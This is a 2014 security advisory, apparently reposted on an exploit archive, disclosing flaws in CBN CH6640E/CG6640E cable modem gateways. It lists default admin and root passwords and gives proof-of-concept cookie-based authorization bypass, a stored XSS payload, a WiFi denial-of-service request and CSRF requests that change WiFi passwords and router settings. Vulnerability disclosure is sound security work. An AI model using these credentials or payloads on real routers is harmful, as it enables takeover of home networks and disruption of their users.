Home / exploitsPDF  

CBN CH6640E/CG6640E Wireless Gateway XSS / CSRF / DoS / Disclosure

Posted on 28 October 2014

 CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities Vendor: Compal Broadband Networks (CBN), Inc. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0 Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. Default credentials: admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information. Desc: The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php 04.10.2014 --- Authorization Bypass Information Disclosure Vulnerability ######################################################### http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml Set cookie: userData to root or admin, reveals additional pages/info. -- <html> <body> <script> document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Denial of Service (DoS) for all WiFi connected clients (disconnect) ################################################################### GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 Stored Cross-Site Scripting (XSS) Vulnerability ############################################### Cookie: userData Value: hax0r"><script>alert(document.cookie);</script> -- <html> <body> <script> document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Cross-Site Request Forgery (CSRF) Vulnerability ############################################### DDNS config: ------------ GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 Change wifi pass: ----------------- GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 Add static mac address (static assigned dhcp client): ----------------------------------------------------- GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 Enable/Disable UPnP: -------------------- GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

 

TOP